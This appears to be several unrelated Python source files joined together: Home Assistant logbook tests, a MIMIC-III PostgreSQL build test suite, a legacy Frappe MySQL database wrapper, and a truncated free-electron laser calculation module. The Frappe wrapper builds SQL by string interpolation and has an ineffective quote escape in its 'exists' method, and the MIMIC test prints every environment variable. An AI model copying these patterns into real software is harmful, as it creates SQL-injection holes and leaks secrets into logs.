eventA = self.create_state_changed_event(pointA, 'switch.bla',
STATE_ON)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('turned on', message)
# message for a switch turned off
eventA = self.create_state_changed_event(pointA, 'switch.bla',
STATE_OFF)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('turned off', message)
def test_entry_message_from_state_device_tracker(self):
"""Test if logbook message is correctly created for device tracker."""
pointA = dt_util.utcnow()
# message for a device tracker "not home" state
eventA = self.create_state_changed_event(pointA, 'device_tracker.john',
STATE_NOT_HOME)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('is away', message)
# message for a device tracker "home" state
eventA = self.create_state_changed_event(pointA, 'device_tracker.john',
'work')
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('is at work', message)
def test_entry_message_from_state_sun(self):
"""Test if logbook message is correctly created for sun."""
pointA = dt_util.utcnow()
# message for a sun rise
eventA = self.create_state_changed_event(pointA, 'sun.sun',
sun.STATE_ABOVE_HORIZON)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('has risen', message)
# message for a sun set
eventA = self.create_state_changed_event(pointA, 'sun.sun',
sun.STATE_BELOW_HORIZON)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('has set', message)
def test_process_custom_logbook_entries(self):
"""Test if custom log book entries get added as an entry."""
name = 'Nice name'
message = 'has a custom entry'
entity_id = 'sun.sun'
entries = list(logbook.humanify((
ha.Event(logbook.EVENT_LOGBOOK_ENTRY, {
logbook.ATTR_NAME: name,
logbook.ATTR_MESSAGE: message,
logbook.ATTR_ENTITY_ID: entity_id,
}),
)))
self.assertEqual(1, len(entries))
self.assert_entry(
entries[0], name=name, message=message,
domain='sun', entity_id=entity_id)
def assert_entry(self, entry, when=None, name=None, message=None,
domain=None, entity_id=None):
"""Assert an entry is what is expected."""
if when:
self.assertEqual(when, entry.when)
if name:
self.assertEqual(name, entry.name)
if message:
self.assertEqual(message, entry.message)
if domain:
self.assertEqual(domain, entry.domain)
if entity_id:
self.assertEqual(entity_id, entry.entity_id)
def create_state_changed_event(self, event_time_fired, entity_id, state,
attributes=None, last_changed=None,
last_updated=None):
"""Create state changed event."""
# Logbook only cares about state change events that
# contain an old state but will not actually act on it.
state = ha.State(entity_id, state, attributes, last_changed,
last_updated).as_dict()
return ha.Event(EVENT_STATE_CHANGED, {
'entity_id': entity_id,
'old_state': state,
'new_state': state,
}, time_fired=event_time_fired)
|
|
import unittest
import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
import pandas as pd
import os
from subprocess import call
# Prep for Oracle and MySQL database connection
# http://stackoverflow.com/questions/10065051/python-pandas-and-databases-like-mysql
# import cx_Oracle
# import MySQLdb
# Config
psqluser = 'postgres'
testdbname = 'mimic_test_db'
hostname = 'localhost'
datadir = 'testdata/v1_3/'
schema = 'mimiciii'
# Set paths for scripts to be tested
curpath = os.path.join(os.path.dirname(__file__)) + '/'
# Display environment variables
print(os.environ)
# Create dictionary with table details for use in testing
row_dict = {
"ADMISSIONS": 58976,
"CALLOUT": 34499,
"CAREGIVERS": 7567,
"CHARTEVENTS": 263201375,
"CPTEVENTS": 573146,
"D_CPT": 134,
"D_ICD_DIAGNOSES": 14567,
"D_ICD_PROCEDURES": 3882,
"D_ITEMS": 12478,
"D_LABITEMS": 755,
"DATETIMEEVENTS": 4486049,
"DIAGNOSES_ICD": 651047,
"DRGCODES": 125557,
"ICUSTAYS": 61532,
"INPUTEVENTS_CV": 17528894,
"INPUTEVENTS_MV": 3618991,
"LABEVENTS": 27872575,
"MICROBIOLOGYEVENTS": 328446,
"NOTEEVENTS": 2078705,
"OUTPUTEVENTS": 4349339,
"PATIENTS": 46520,
"PRESCRIPTIONS": 4156848,
"PROCEDUREEVENTS_MV": 258066,
"PROCEDURES_ICD": 240095,
"SERVICES": 73343,
"TRANSFERS": 261897 }
# # Load build scripts
# def executescripts(filename):
# # Open and read the file as a single buffer
# fd = open(filename, 'r')
# sqlFile = fd.read()
# fd.close()
# # all SQL commands (split on ';')
# sqlcommands = sqlFile.split(';')
# # Execute every command from the input file
# for command in sqlcommands:
# # This will skip and report errors
# # For example, if the tables do not yet exist, this will skip over
# # the DROP TABLE commands
# try:
# c.execute(command)
# except OperationalError, msg:
# print "Command skipped: ", msg
def run_postgres_build_scripts(cur):
# Create tables
fn = curpath + '../buildmimic/postgres/postgres_create_tables.sql'
cur.execute(open(fn, "r").read())
# Loads data
fn = curpath + '../buildmimic/postgres/postgres_load_data.sql'
if os.environ.has_key('USER') and os.environ['USER'] == 'jenkins':
# use full dataset
mimic_data_dir = '/home/mimicadmin/data/mimiciii_1_3/'
else:
mimic_data_dir = curpath+datadir
call(['psql','-f',fn,'-d',testdbname,'-U',psqluser,'-v','mimic_data_dir='+mimic_data_dir])
# Add constraints
fn = curpath + '../buildmimic/postgres/postgres_add_constraints.sql'
cur.execute(open(fn, "r").read())
# Add indexes
fn = curpath + '../buildmimic/postgres/postgres_add_indexes.sql'
cur.execute(open(fn, "r").read())
# # Prep for adding MySQL build
# def run_mysql_build_scripts(cur):
# # Create tables
# fn = curpath + '../buildmimic/mysql/mysql_create_tables.sql'
# cur.execute(open(fn, "r").read())
# # Loads data
# fn = curpath + '../buildmimic/mysql/mysql_load_data.sql'
# if os.environ.has_key('USER') and os.environ['USER'] == 'jenkins':
# # use full dataset
# mimic_data_dir = '/home/mimicadmin/data/mimiciii_1_3/'
# else:
# mimic_data_dir = curpath+datadir
# call(['psql','-f',fn,'-d',testdbname,'-U',psqluser,'-v','mimic_data_dir='+mimic_data_dir])
# # Add constraints
# fn = curpath + '../buildmimic/mysql/mysql_add_constraints.sql'
# cur.execute(open(fn, "r").read())
# # Add indexes
# fn = curpath + '../buildmimic/mysql/mysql_add_indexes.sql'
# cur.execute(open(fn, "r").read())
# Class to run unit tests
class test_postgres(unittest.TestCase):
# setUpClass runs once for the class
@classmethod
def setUpClass(cls):
# Connect to default postgres database
cls.con = psycopg2.connect(dbname='postgres', user=psqluser)
cls.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cls.cur = cls.con.cursor()
# Create test database
try:
cls.cur.execute('DROP DATABASE ' + testdbname)
except psycopg2.ProgrammingError:
pass
cls.cur.execute('CREATE DATABASE ' + testdbname)
cls.cur.close()
cls.con.close()
# Connect to the test database
cls.con = psycopg2.connect(dbname=testdbname, user=psqluser)
cls.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cls.cur = cls.con.cursor()
# Build the test database
run_postgres_build_scripts(cls.cur)
cls.cur.close()
cls.con.close()
# tearDownClass runs once for the class
@classmethod
def tearDownClass(cls):
# Connect to default postgres database
cls.con = psycopg2.connect(dbname='postgres', user=psqluser)
cls.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cls.cur = cls.con.cursor()
# Drop test database
cls.cur.execute('DROP DATABASE ' + testdbname)
cls.cur.close()
cls.con.close()
# setUp runs once for each test method
def setUp(self):
# Connect to the test database
self.con = psycopg2.connect(dbname=testdbname, user=psqluser)
self.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
self.cur = self.con.cursor()
# tearDown runs once for each test method
def tearDown(self):
self.cur.close()
self.con.close()
# The MIMIC test db has been created by this point
# Add unit tests below
def test_run_sample_query(self):
test_query = """
SELECT 'hello world';
"""
hello_world = pd.read_sql_query(test_query,self.con)
self.assertEqual(hello_world.values[0][0],'hello world')
def test_testddl(self):
# Creates and drops an example schema and table
fn = curpath + 'testddl.sql'
self.cur.execute(open(fn, "r").read())
# self.assertEqual(1,1)
# --------------------------------------------------
# Run a series of checks to ensure ITEMIDs are valid
# All checks should return 0.
# --------------------------------------------------
def test_itemids_in_inputevents_cv_are_shifted(self):
query = """
-- prompt Number of ITEMIDs which were erroneously left as original value
select count(*) from mimiciii.inputevents_cv
where itemid < 30000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_inputevents_mv_are_shifted(self):
query = """
-- prompt Number of ITEMIDs which were erroneously left as original value
select count(*) from mimiciii.inputevents_mv
where itemid < 220000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_outputevents_are_shifted(self):
query = """
-- prompt Number of ITEMIDs which were erroneously left as original value
select count(*) from mimiciii.outputevents
where itemid < 30000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_inputevents_cv_are_in_range(self):
query = """
-- prompt Number of ITEMIDs which are above the allowable range
select count(*) from mimiciii.inputevents_cv
where itemid > 50000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_outputevents_are_in_range(self):
query = """
-- prompt Number of ITEMIDs which are not in the allowable range
select count(*) from mimiciii.outputevents
where itemid > 50000 and itemid < 220000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_chartevents_are_in_range(self):
query = """
-- prompt Number of ITEMIDs which are not in the allowable range
select count(*) from mimiciii.chartevents
where itemid > 20000 AND itemid < 220000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_procedureevents_mv_are_in_range(self):
query = """
-- prompt Number of ITEMIDs which are not in the allowable range
select count(*) from mimiciii.procedureevents_mv
where itemid < 220000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_labevents_are_in_range(self):
query = """
-- prompt Number of ITEMIDs which are not in the allowable range
select count(*) from mimiciii.labevents
where itemid < 50000 or itemid > 60000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
def test_itemids_in_microbiologyevents_are_in_range(self):
query = """
-- prompt Number of ITEMIDs which are not in the allowable range
select count(*) from mimiciii.microbiologyevents
where SPEC_ITEMID < 70000 or SPEC_ITEMID > 80000
or ORG_ITEMID < 80000 or ORG_ITEMID > 90000
or AB_ITEMID < 90000 or AB_ITEMID > 100000;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],0)
# ----------------------------------------------------
# RUN THE FOLLOWING TESTS ON THE FULL DATASET ONLY ---
# ----------------------------------------------------
if os.environ.has_key('USER') and os.environ['USER'] == 'jenkins':
def test_row_counts_are_as_expected(self):
for tablename,expectedrows in row_dict.iteritems():
query = "SELECT COUNT(*) FROM " + schema + "." + tablename + ";"
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult.values[0][0],expectedrows)
def test_age_and_los_is_expected(self):
query = \
"""
WITH icuadmissions as (
SELECT a.subject_id, a.hadm_id, i.icustay_id,
a.admittime as hosp_admittime, a.dischtime as hosp_dischtime,
i.first_careunit,
DENSE_RANK() over(PARTITION BY a.hadm_id ORDER BY i.intime ASC) as icu_seq,
p.dob, p.dod, i.intime as icu_intime, i.outtime as icu_outtime,
i.los as icu_los,
round((EXTRACT(EPOCH FROM (a.dischtime-a.admittime))/60/60/24) :: NUMERIC, 4) as hosp_los,
p.gender,
round((EXTRACT(EPOCH FROM (a.admittime-p.dob))/60/60/24/365.242) :: NUMERIC, 4) as age_hosp_in,
round((EXTRACT(EPOCH FROM (i.intime-p.dob))/60/60/24/365.242) :: NUMERIC, 4) as age_icu_in,
hospital_expire_flag,
CASE WHEN p.dod IS NOT NULL
AND p.dod >= i.intime - interval '6 hour'
AND p.dod <= i.outtime + interval '6 hour' THEN 1
ELSE 0 END AS icu_expire_flag
FROM admissions a
INNER JOIN icustays i
ON a.hadm_id = i.hadm_id
INNER JOIN patients p
ON a.subject_id = p.subject_id
ORDER BY a.subject_id, i.intime)
SELECT round(avg(age_icu_in)) as avg_age_icu,
round(avg(hosp_los)) as avg_los_hosp,
round(avg(icu_los)) as avg_los_icu
FROM icuadmissions;
"""
queryresult = pd.read_sql_query(query,self.con)
self.assertEqual(queryresult['avg_age_icu'].values[0][0],65)
self.assertEqual(queryresult['avg_los_hosp'].values[0][0],11)
self.assertEqual(queryresult['avg_los_icu'].values[0][0],5)
def main():
unittest.main()
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Database Module
# --------------------
from __future__ import unicode_literals
import MySQLdb
from markdown2 import UnicodeWithAttrs
import warnings
import datetime
import frappe
import re
import frappe.model.meta
from frappe.utils import now, get_datetime
from frappe import _
class Database:
"""
Open a database connection with the given parmeters, if use_default is True, use the
login details from `conf.py`. This is called by the request handler and is accessible using
the `db` global variable. the `sql` method is also global to run queries
"""
def __init__(self, host=None, user=None, password=None, ac_name=None, use_default = 0):
self.host = host or frappe.conf.db_host or 'localhost'
self.user = user or frappe.conf.db_name
self._conn = None
if ac_name:
self.user = self.get_db_login(ac_name) or frappe.conf.db_name
if use_default:
self.user = frappe.conf.db_name
self.transaction_writes = 0
self.auto_commit_on_many_writes = 0
self.password = password or frappe.conf.db_password
def get_db_login(self, ac_name):
return ac_name
def connect(self):
"""
Connect to a database
"""
warnings.filterwarnings('ignore', category=MySQLdb.Warning)
self._conn = MySQLdb.connect(user=self.user, host=self.host, passwd=self.password,
use_unicode=True, charset='utf8')
self._conn.converter[246]=float
self._conn.converter[12]=get_datetime
self._conn.encoders[UnicodeWithAttrs] = self._conn.encoders[unicode]
self._cursor = self._conn.cursor()
if self.user != 'root':
self.use(self.user)
frappe.local.rollback_observers = []
def use(self, db_name):
"""
`USE` db_name
"""
self._conn.select_db(db_name)
self.cur_db_name = db_name
def validate_query(self, q):
cmd = q.strip().lower().split()[0]
if cmd in ['alter', 'drop', 'truncate'] and frappe.user.name != 'Administrator':
frappe.throw(_("Not permitted"), frappe.PermissionError)
def sql(self, query, values=(), as_dict = 0, as_list = 0, formatted = 0,
debug=0, ignore_ddl=0, as_utf8=0, auto_commit=0, update=None):
"""
* Execute a `query`, with given `values`
* returns as a dictionary if as_dict = 1
* returns as a list of lists (with cleaned up dates) if as_list = 1
"""
if not self._conn:
self.connect()
# in transaction validations
self.check_transaction_status(query)
# autocommit
if auto_commit: self.commit()
# execute
try:
if values!=():
if isinstance(values, dict):
values = dict(values)
# MySQL-python==1.2.5 hack!
if not isinstance(values, (dict, tuple, list)):
values = (values,)
if debug:
try:
self.explain_query(query, values)
frappe.errprint(query % values)
except TypeError:
frappe.errprint([query, values])
if (frappe.conf.get("logging") or False)==2:
frappe.log("<<<< query")
frappe.log(query)
frappe.log("with values:")
frappe.log(values)
frappe.log(">>>>")
self._cursor.execute(query, values)
else:
if debug:
self.explain_query(query)
frappe.errprint(query)
if (frappe.conf.get("logging") or False)==2:
frappe.log("<<<< query")
frappe.log(query)
frappe.log(">>>>")
self._cursor.execute(query)
except Exception, e:
# ignore data definition errors
if ignore_ddl and e.args[0] in (1146,1054,1091):
pass
else:
raise
if auto_commit: self.commit()
# scrub output if required
if as_dict:
ret = self.fetch_as_dict(formatted, as_utf8)
if update:
for r in ret:
r.update(update)
return ret
elif as_list:
return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
elif as_utf8:
return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
else:
return self._cursor.fetchall()
def explain_query(self, query, values=None):
try:
frappe.errprint("--- query explain ---")
if values is None:
self._cursor.execute("explain " + query)
else:
self._cursor.execute("explain " + query, values)
import json
frappe.errprint(json.dumps(self.fetch_as_dict(), indent=1))
frappe.errprint("--- query explain end ---")
except:
frappe.errprint("error in query explain")
def sql_list(self, query, values=(), debug=False):
return [r[0] for r in self.sql(query, values, debug=debug)]
def sql_ddl(self, query, values=()):
self.commit()
self.sql(query)
def check_transaction_status(self, query):
if self.transaction_writes and \
query and query.strip().split()[0].lower() in ['start', 'alter', 'drop', 'create', "begin"]:
raise Exception, 'This statement can cause implicit commit'
if query and query.strip().lower() in ('commit', 'rollback'):
self.transaction_writes = 0
if query[:6].lower() in ['update', 'insert']:
self.transaction_writes += 1
if self.transaction_writes > 20000:
if self.auto_commit_on_many_writes:
frappe.db.commit()
else:
frappe.throw(_("Too many writes in one request. Please send smaller requests"), frappe.ValidationError)
def fetch_as_dict(self, formatted=0, as_utf8=0):
result = self._cursor.fetchall()
ret = []
needs_formatting = self.needs_formatting(result, formatted)
for r in result:
row_dict = frappe._dict({})
for i in range(len(r)):
if needs_formatting:
val = self.convert_to_simple_type(r[i], formatted)
else:
val = r[i]
if as_utf8 and type(val) is unicode:
val = val.encode('utf-8')
row_dict[self._cursor.description[i][0]] = val
ret.append(row_dict)
return ret
def needs_formatting(self, result, formatted):
if result and result[0]:
for v in result[0]:
if isinstance(v, (datetime.date, datetime.timedelta, datetime.datetime, long)):
return True
if formatted and isinstance(v, (int, float)):
return True
return False
def get_description(self):
return self._cursor.description
def convert_to_simple_type(self, v, formatted=0):
from frappe.utils import formatdate, fmt_money
if isinstance(v, (datetime.date, datetime.timedelta, datetime.datetime, long)):
if isinstance(v, datetime.date):
v = unicode(v)
if formatted:
v = formatdate(v)
# time
elif isinstance(v, (datetime.timedelta, datetime.datetime)):
v = unicode(v)
# long
elif isinstance(v, long):
v=int(v)
# convert to strings... (if formatted)
if formatted:
if isinstance(v, float):
v=fmt_money(v)
elif isinstance(v, int):
v = unicode(v)
return v
def convert_to_lists(self, res, formatted=0, as_utf8=0):
nres = []
needs_formatting = self.needs_formatting(res, formatted)
for r in res:
nr = []
for c in r:
if needs_formatting:
val = self.convert_to_simple_type(c, formatted)
else:
val = c
if as_utf8 and type(val) is unicode:
val = val.encode('utf-8')
nr.append(val)
nres.append(nr)
return nres
def convert_to_utf8(self, res, formatted=0):
nres = []
for r in res:
nr = []
for c in r:
if type(c) is unicode:
c = c.encode('utf-8')
nr.append(self.convert_to_simple_type(c, formatted))
nres.append(nr)
return nres
def build_conditions(self, filters):
def _build_condition(key):
"""
filter's key is passed by map function
build conditions like:
* ifnull(`fieldname`, default_value) = %(fieldname)s
* `fieldname` [=, !=, >, >=, <, <=] %(fieldname)s
"""
_operator = "="
value = filters.get(key)
if isinstance(value, (list, tuple)):
_operator = value[0]
filters[key] = value[1]
if _operator not in ["=", "!=", ">", ">=", "<", "<=", "like"]:
_operator = "="
if "[" in key:
split_key = key.split("[")
return "ifnull(`" + split_key[0] + "`, " + split_key[1][:-1] + ") " \
+ _operator + " %(" + key + ")s"
else:
return "`" + key + "` " + _operator + " %(" + key + ")s"
if isinstance(filters, basestring):
filters = { "name": filters }
conditions = map(_build_condition, filters)
return " and ".join(conditions), filters
def get(self, doctype, filters=None, as_dict=True):
return self.get_value(doctype, filters, "*", as_dict=as_dict)
def get_value(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False, debug=False):
"""Get a single / multiple value from a record.
For Single DocType, let filters be = None"""
ret = self.get_values(doctype, filters, fieldname, ignore, as_dict, debug)
return ((len(ret[0]) > 1 or as_dict) and ret[0] or ret[0][0]) if ret else None
def get_values(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False, debug=False, order_by=None, update=None):
if isinstance(filters, list):
return self.get_value_for_many_names(doctype, filters, fieldname, debug=debug)
fields = fieldname
if fieldname!="*":
if isinstance(fieldname, basestring):
fields = [fieldname]
else:
fields = fieldname
if (filters is not None) and (filters!=doctype or doctype=="DocType"):
try:
return self.get_values_from_table(fields, filters, doctype, as_dict, debug, order_by, update)
except Exception, e:
if ignore and e.args[0] in (1146, 1054):
# table or column not found, return None
return None
elif (not ignore) and e.args[0]==1146:
# table not found, look in singles
pass
else:
raise
return self.get_values_from_single(fields, filters, doctype, as_dict, debug, update)
def get_values_from_single(self, fields, filters, doctype, as_dict=False, debug=False, update=None):
# TODO
# if not frappe.model.meta.is_single(doctype):
# raise frappe.DoesNotExistError("DocType", doctype)
if fields=="*" or isinstance(filters, dict):
# check if single doc matches with filters
values = self.get_singles_dict(doctype)
if isinstance(filters, dict):
for key, value in filters.items():
if values.get(key) != value:
return []
if as_dict:
return values and [values] or []
if isinstance(fields, list):
return [map(lambda d: values.get(d), fields)]
else:
r = self.sql("""select field, value
from tabSingles where field in (%s) and doctype=%s""" \
% (', '.join(['%s'] * len(fields)), '%s'),
tuple(fields) + (doctype,), as_dict=False, debug=debug)
if as_dict:
if r:
r = frappe._dict(r)
if update:
r.update(update)
return [r]
else:
return []
else:
return r and [[i[1] for i in r]] or []
def get_singles_dict(self, doctype):
return frappe._dict(self.sql("""select field, value from
tabSingles where doctype=%s""", doctype))
def get_single_value(self, doctype, fieldname):
val = self.sql("""select value from
tabSingles where doctype=%s and field=%s""", (doctype, fieldname))
return val[0][0] if val else None
def get_values_from_table(self, fields, filters, doctype, as_dict, debug, order_by=None, update=None):
fl = []
if isinstance(fields, (list, tuple)):
for f in fields:
if "(" in f or " as " in f: # function
fl.append(f)
else:
fl.append("`" + f + "`")
fl = ", ".join(fl)
else:
fl = fields
if fields=="*":
as_dict = True
conditions, filters = self.build_conditions(filters)
order_by = ("order by " + order_by) if order_by else ""
r = self.sql("select %s from `tab%s` where %s %s" % (fl, doctype,
conditions, order_by), filters, as_dict=as_dict, debug=debug, update=update)
return r
def get_value_for_many_names(self, doctype, names, field, debug=False):
names = filter(None, names)
if names:
return dict(self.sql("select name, `%s` from `tab%s` where name in (%s)" \
% (field, doctype, ", ".join(["%s"]*len(names))), names, debug=debug))
else:
return {}
def set_value(self, dt, dn, field, val, modified=None, modified_by=None):
if not modified:
modified = now()
if not modified_by:
modified_by = frappe.session.user
if dn and dt!=dn:
self.sql("""update `tab%s` set `%s`=%s, modified=%s, modified_by=%s
where name=%s""" % (dt, field, "%s", "%s", "%s", "%s"),
(val, modified, modified_by, dn))
else:
if self.sql("select value from tabSingles where field=%s and doctype=%s", (field, dt)):
self.sql("""update tabSingles set value=%s where field=%s and doctype=%s""",
(val, field, dt))
else:
self.sql("""insert into tabSingles(doctype, field, value)
values (%s, %s, %s)""", (dt, field, val))
if field not in ("modified", "modified_by"):
self.set_value(dt, dn, "modified", modified)
self.set_value(dt, dn, "modified_by", modified_by)
def set(self, doc, field, val):
doc.db_set(field, val)
def touch(self, doctype, docname):
from frappe.utils import now
modified = now()
frappe.db.sql("""update `tab{doctype}` set `modified`=%s
where name=%s""".format(doctype=doctype), (modified, docname))
return modified
def set_global(self, key, val, user='__global'):
self.set_default(key, val, user)
def get_global(self, key, user='__global'):
return self.get_default(key, user)
def set_default(self, key, val, parent="__default", parenttype=None):
import frappe.defaults
frappe.defaults.set_default(key, val, parent, parenttype)
def add_default(self, key, val, parent="__default", parenttype=None):
import frappe.defaults
frappe.defaults.add_default(key, val, parent, parenttype)
def get_default(self, key, parent="__default"):
"""get default value"""
import frappe.defaults
d = frappe.defaults.get_defaults(parent).get(key)
return isinstance(d, list) and d[0] or d
def get_defaults_as_list(self, key, parent="__default"):
import frappe.defaults
d = frappe.defaults.get_default(key, parent)
return isinstance(d, basestring) and [d] or d
def get_defaults(self, key=None, parent="__default"):
"""get all defaults"""
import frappe.defaults
if key:
return frappe.defaults.get_defaults(parent).get(key)
else:
return frappe.defaults.get_defaults(parent)
def begin(self):
return # not required
def commit(self):
self.sql("commit")
frappe.local.rollback_observers = []
def rollback(self):
self.sql("rollback")
for obj in frappe.local.rollback_observers:
if hasattr(obj, "on_rollback"):
obj.on_rollback()
frappe.local.rollback_observers = []
def field_exists(self, dt, fn):
return self.sql("select name from tabDocField where fieldname=%s and parent=%s", (dt, fn))
def table_exists(self, tablename):
return tablename in [d[0] for d in self.sql("show tables")]
def a_row_exists(self, doctype):
return self.sql("select name from `tab{doctype}` limit 1".format(doctype=doctype))
def exists(self, dt, dn=None):
if isinstance(dt, basestring):
if dt!="DocType" and dt==dn:
return True # single always exists (!)
try:
return self.sql('select name from `tab%s` where name=%s' % (dt, '%s'), (dn,))
except:
return None
elif isinstance(dt, dict) and dt.get('doctype'):
try:
conditions = []
for d in dt:
if d == 'doctype': continue
conditions.append('`%s` = "%s"' % (d, dt[d].replace('"', '\"')))
return self.sql('select name from `tab%s` where %s' % \
(dt['doctype'], " and ".join(conditions)))
except:
return None
def count(self, dt, filters=None, debug=False):
if filters:
conditions, filters = self.build_conditions(filters)
return frappe.db.sql("""select count(*)
from `tab%s` where %s""" % (dt, conditions), filters, debug=debug)[0][0]
else:
return frappe.db.sql("""select count(*)
from `tab%s`""" % (dt,))[0][0]
def get_creation_count(self, doctype, minutes):
"""get count of records created in the last x minutes"""
from frappe.utils import now_datetime
from dateutil.relativedelta import relativedelta
return frappe.db.sql("""select count(name) from `tab{doctype}`
where creation >= %s""".format(doctype=doctype),
now_datetime() - relativedelta(minutes=minutes))[0][0]
def get_table_columns(self, doctype):
return [r[0] for r in self.sql("DESC `tab%s`" % doctype)]
def add_index(self, doctype, fields, index_name=None):
if not index_name:
index_name = "_".join(fields) + "_index"
# remove index length if present e.g. (10) from index name
index_name = re.sub(r"\s*\([^)]+\)\s*", r"", index_name)
if not frappe.db.sql("""show index from `tab%s` where Key_name="%s" """ % (doctype, index_name)):
frappe.db.commit()
frappe.db.sql("""alter table `tab%s`
add index `%s`(%s)""" % (doctype, index_name, ", ".join(fields)))
def close(self):
if self._conn:
self._cursor.close()
self._conn.close()
self._cursor = None
self._conn = None
def escape(self, s):
if isinstance(s, unicode):
s = (s or "").encode("utf-8")
return unicode(MySQLdb.escape_string(s), "utf-8")
|
|
"""
Python module for the basis of free-electron laser calculation.
"""
from __future__ import print_function
import numpy as np
import scipy.special as sp
from scipy.optimize import fsolve
class PhysicalConstants(object):
"""Physical constants
:param c0: :math:`c_0`, velocity of light in vacuum
:param epsilon0: :math:`\epsilon_0`, permittivity in vacuum
:param mu0: :math:`\mu_0`, permeability in vacuum
:param e0: :math:`e`, electron charge, [C]
:param m0: :math:`m_e`, electron mass, [kg]
:param h0: :math:`h`, Plank constant
:param currentA: :math:`I_A`, Alven current, [A]
"""
c0 = 2.99792458E+08
epsilon0 = 8.854187817620390E-12
mu0 = np.pi * 4E-7
e0 = 1.60218E-19
m0 = 9.10938E-31
h0 = 6.62607E-34
currentA = 17045
class HalbachPerm(object):
"""
Input parameters:
:param _a: first Halbach parameter
:param _b: second Halbach parameter
:parma _c: third Halbach parameter
:param _lambdau: undulator period length, [mm]
:parma _Bu: undulator magnetic field, [T]
"""
def __init__(self, _a=3.33, _b=-5.47, _c=1.80, _lambdau=20, _Bu=1.0):
self.coef1 = _a
self.coef2 = _b
self.coef3 = _c
self.lambdau = _lambdau
self.Bu = _Bu
def findGap(self, gap0=10):
"""
Solve undulator gap value
:param gap0: initial gap value vector, [mm]
:return: gap value in [mm]
"""
fbg = lambda x: self.Bu - self.coef1 * np.exp(self.coef2 * x / self.lambdau + self.coef3 * (x / self.lambdau)**2)
return fsolve(fbg, x0=gap0 * np.ones(np.size(self.Bu)))
class FELcalc(PhysicalConstants):
"""
Analytical calculation for Free-electron Laser physics
Usage: res = FELcalc(p1, p2, p3, p4, p5, p6, p7, p8, p9, p10)
:param p1: beamEnergy, [MeV]
:param p2: relative energy spread
:param p3: undulator period length, [m]
:param p4: avgerage beta function, [m]
:param p5: radiation wavelength, [m]
:param p6: normalized transverse emittance, [m]
:param p7: peak current, [A]
:param p8: bunchCharge [C]
:param p9: undulatorLength [m]
:param p10: bunchShape, 'gaussian' or 'flattop'
:return res: dict, keys: "au", "bu", "gap", "sigmar", "rho1D", "rho3D", "Lg1D", "Lg3D", "Psat", "Pshot", "Pss"
"""
def __init__(self,
_beamEnergy=6000.0,
_relativeEnergySpread=0.0001,
_unduPeriodLength=0.015,
_avgBetaFunc=20.0,
_radWavelength=1.0e-10,
_normEmittance=0.4e-6,
_peakCurrent=3500.0,
_bunchCharge=0.5e-9,
_undulatorLength=10.0,
_bunchShape='gaussian',
_undulatorType='planar'):
self.beamEnergy = _beamEnergy
self.relativeEnergySpread = _relativeEnergySpread
self.unduPeriodLength = _unduPeriodLength
self.avgBetaFunc = _avgBetaFunc
self.radWavelength = _radWavelength
self.normEmittance = _normEmittance
self.peakCurrent = _peakCurrent
self.bunchCharge = _bunchCharge
self.undulatorLength = _undulatorLength
self.bunchShape = _bunchShape
self.undulatorType = _undulatorType
if self.bunchShape == 'gaussian':
self.bunchratio = np.sqrt(2.0 * np.pi)
elif self.bunchShape == 'flattop':
self.bunchratio = 1.0
def onFELAnalyse(self):
"""
Apply M. Xie formulae for FEL analytical estimation
"""
# Xie Ming Formulae fitted cofs
a1 = 0.45
a2 = 0.57
a3 = 0.55
a4 = 1.6
a5 = 3.0
a6 = 2.0
a7 = 0.35
a8 = 2.9
a9 = 2.4
a10 = 51.0
a11 = 0.95
a12 = 3.0
a13 = 5.4
a14 = 0.7
a15 = 1.9
a16 = 1140.0
a17 = 2.2
a18 = 2.9
a19 = 3.2
gamma0 = self.beamEnergy / 0.511
eta = self.relativeEnergySpread
lambdau = self.unduPeriodLength
beta = self.avgBetaFunc
lambdas = self.radWavelength
epsilonn = self.normEmittance
Ipk = self.peakCurrent
lu = self.undulatorLength
sigmaBeam = np.sqrt(beta * epsilonn / gamma0)
au = np.sqrt(lambdas * 2.0 * gamma0**2.0 / lambdau - 1)
if self.undulatorType == 'planar':
b = au**2.0 / 2.0 / (1 + au**2)
JJ = sp.jn(0, b) - sp.jn(1, b)
else: # helical
JJ = 1.0
